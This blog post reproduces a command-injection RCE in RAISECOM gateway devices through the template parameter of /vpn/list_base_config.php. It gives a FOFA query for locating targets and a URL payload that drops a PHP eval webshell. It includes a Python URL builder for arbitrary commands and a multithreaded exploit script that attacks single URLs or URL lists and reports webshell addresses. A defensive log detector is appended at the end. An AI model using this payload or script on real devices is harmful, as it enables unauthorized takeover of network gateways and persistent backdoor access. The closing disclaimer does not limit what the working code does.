RAISECOM gateway device list_base_config.php RCE vulnerability reproduction

(Product interface screenshot)

fofa:body="/images/raisecom/back.gif"

The template parameter is injectable. On some targets commands such as id or whoami cannot be executed; only pwd works, and its output has to be redirected into a file under the web root and then fetched over HTTP.

It is therefore more convenient to write a one-line webshell and connect to it. Note the quoting in the payload below: the '+' characters are URL-encoded spaces, and the single quotes around dd close and reopen the shell string, so the file that lands on disk contains <?php eval($_POST[dd]);?> with dd as an unquoted constant. PHP 7 and earlier resolve an undefined constant to its own name (with a warning), so the shell still works there; PHP 8 throws an Error instead.

/vpn/list_base_config.php?type=mod&parts=base_config&template=`echo+-e+'<?php+eval($_POST['dd']);?>'>/www/tmp/dd.php`

Shell address: http://ip/tmp/dd.php (the payload writes /www/tmp/dd.php, and /www is the web root, so the file is served from /tmp/).
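The "run a command, redirect its output into the web root, then fetch the file" technique above, as an added example that is not part of the original post. It builds the injection URL for an arbitrary command with proper percent-encoding (the hand-written payload uses '+' for spaces and raw quotes, which breaks as soon as the command contains '&' or '#'), maps the output file to the URL it is served from, and decodes the crafted URL the way the server's query parser would so the encoding can be checked before sending. The web root /www, the path /vpn/list_base_config.php and the target address 192.0.2.10 (a documentation address) are assumptions taken from the post, not verified device facts.

```python
from urllib.parse import quote, urlsplit, parse_qs

VULN_PATH = "/vpn/list_base_config.php"
WEB_ROOT = "/www"  # assumption: the device serves /www as its document root


def build_injection_url(base_url, command, out_file="/www/tmp/out.txt"):
    """Build the GET URL that runs `command` through backtick substitution in
    the template parameter and redirects its output into out_file.

    The whole backtick expression is percent-encoded (quote with safe=""), so
    spaces, quotes, '&' and '#' in the command survive server-side query
    parsing instead of being taken as query-string delimiters.
    """
    shell = "`" + command + " >" + out_file + " 2>&1`"
    query = "type=mod&parts=base_config&template=" + quote(shell, safe="")
    return base_url.rstrip("/") + VULN_PATH + "?" + query


def web_path_for(fs_path, web_root=WEB_ROOT):
    """Map a file written under the web root to the URL path it is served from,
    e.g. /www/tmp/out.txt -> /tmp/out.txt. A file outside the root cannot be
    fetched over HTTP, so that is rejected here."""
    if not fs_path.startswith(web_root + "/"):
        raise ValueError("not under the web root: " + fs_path)
    return fs_path[len(web_root):]


def injected_shell_text(url):
    """Decode a crafted URL the way the server's query parser would and return
    the raw text that ends up in the template parameter. Lets you confirm the
    encoding round-trips before anything is sent."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("template", [""])[0]


def command_via_file(base_url, command, out_file="/www/tmp/out.txt"):
    """The two-step technique from the post for targets where output is not
    reflected: returns (URL to send, URL to read the result from)."""
    send = build_injection_url(base_url, command, out_file)
    read = base_url.rstrip("/") + web_path_for(out_file)
    return send, read


if __name__ == "__main__":
    # 192.0.2.10 is a documentation address, not a real device
    send, read = command_via_file("http://192.0.2.10", "pwd")
    print("send:     " + send)
    print("then GET: " + read)
    print("server sees template = " + injected_shell_text(send))
```

On a target that only lets pwd through, the same builder still gives you the exact request and the exact read-back URL, which is the pair you need to confirm code execution without guessing at paths.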

The EXP is as follows:

import requests
import argparse
import urllib3
import warnings
import threading


# Silence urllib3's InsecureRequestWarning: certificate verification is
# deliberately disabled below (verify=False) because these devices use
# self-signed certificates
urllib3.disable_warnings()
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0',
    'Cache-Control': 'max-age=0',
    'Sec-Ch-Ua': '"Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
}

# Backtick command substitution inside the template parameter; the echo writes a
# one-line webshell under the web root (/www), which is then served from /tmp/.
# The file name in the payload and in shell_file must match.
payload = "/vpn/list_base_config.php?type=mod&parts=base_config&template=`echo+-e+'<?php+eval($_POST['xxxx']);?>'>/www/tmp/dd323xx.php`"
shell_file = "/tmp/dd323xx.php"
shell_pass = "xxxx"

# Results collected by the multi-threaded batch scan; the lock keeps the set
# and the console output consistent across threads
results = set()
results_lock = threading.Lock()


def check(url):
    """Fire the payload at one target and return the webshell URL if the
    dropped file is reachable, otherwise None. Network errors propagate."""
    url = url.rstrip("/")
    resp = requests.get(url + payload, headers=headers, verify=False, timeout=5)
    if resp.status_code != 200:
        return None
    file_url = url + shell_file
    file_resp = requests.get(file_url, headers=headers, verify=False, timeout=5)
    if file_resp.status_code == 200:
        return file_url
    return None


def scan(url):
    """Single-target mode (-u)."""
    try:
        file_url = check(url)
    except Exception:
        print("\033[31m[-] " + url + " request failed\033[0m")
        return
    if file_url:
        print("\033[32m[+] vulnerable, visit " + file_url + " (webshell password: " + shell_pass + ")\033[0m")
    else:
        print("\033[31m[-] " + url + " not vulnerable\033[0m")


def file_scan(url):
    """Batch mode (-f): same check, results de-duplicated into `results`."""
    try:
        file_url = check(url)
    except Exception:
        print("\033[31m[-] " + url + "\033[0m")
        return
    if not file_url:
        return
    result = "\033[32m[+] " + file_url + " webshell password: " + shell_pass + "\033[0m"
    with results_lock:
        if result not in results:
            results.add(result)
            print(result)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="2024.08.01")
    parser.add_argument('-u', '--url', help='eg: -u http://www.xx.com')
    parser.add_argument('-f', '--file', help='eg: -f urls.txt')
    args = parser.parse_args()
    if args.url:
        scan(args.url)

    elif args.file:
        with open(args.file, 'r') as f:
            raisecom_urls = [line.strip() for line in f if line.strip()]

        # One thread per target, as in the original; fine for short lists
        threads = []
        for raisecom_url in raisecom_urls:
            thread = threading.Thread(target=file_scan, args=(raisecom_url,))
            thread.start()
            threads.append(thread)

        for thread in threads:
            thread.join()

    else:
        print(parser.format_help())
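The defensive side of the same request, as an added example that is not part of the original post: a small detector that flags access-log entries for list_base_config.php whose template parameter contains shell metacharacters after percent-decoding, so both the raw backtick payload and its %60-encoded form are caught. The log lines are constructed for the example (203.0.113.0/24 is a documentation range), and the combined access-log format is an assumption; the device's real log format may differ.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed format)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# Characters that turn a value in `template` into command substitution,
# redirection or command chaining; the post's payload relies on ` and >
SHELL_META = re.compile(r"[`$;|&<>]")


def template_param(target):
    """Return the decoded `template` value of a list_base_config.php request,
    or None when the request is for another path or lacks the parameter."""
    parts = urlsplit(target)
    if not parts.path.endswith("/vpn/list_base_config.php"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("template")
    return values[0] if values else None


def is_injection_attempt(logline):
    """True when the logged request targets the vulnerable script with shell
    metacharacters in `template` (checked after percent-decoding)."""
    m = REQUEST_RE.search(logline)
    if m is None:
        return False
    value = template_param(m.group("target"))
    return value is not None and SHELL_META.search(value) is not None


def scan_log(lines):
    """Return the log lines that look like exploitation attempts."""
    return [line for line in lines if is_injection_attempt(line)]


# Constructed sample log lines (not from any real device). Line 2 is the
# post's technique with the backticks percent-encoded, line 3 uses $(...)
# instead, line 4 is the attacker fetching the output file, which this rule
# alone does not flag; correlate it with the hit just before it.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Aug/2024:01:52:00 +0800] "GET /vpn/list_base_config.php?type=mod&parts=base_config&template=default HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Aug/2024:01:52:01 +0800] "GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60pwd%3E/www/tmp/a.txt%60 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Aug/2024:01:52:02 +0800] "GET /vpn/list_base_config.php?type=mod&parts=base_config&template=$(id) HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Aug/2024:01:52:03 +0800] "GET /tmp/a.txt HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("[!] " + hit)
```

Any 200 response to a path under /tmp/ shortly after a hit is the output file or webshell being collected, so a follow-up rule keyed on that sequence is worth adding where the log volume allows it.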

Disclaimer: the exploit script is for learning and reference only; obey the relevant laws and regulations and do not conduct unauthorized penetration testing.

posted @ 2024-08-01 01:52  Fengzun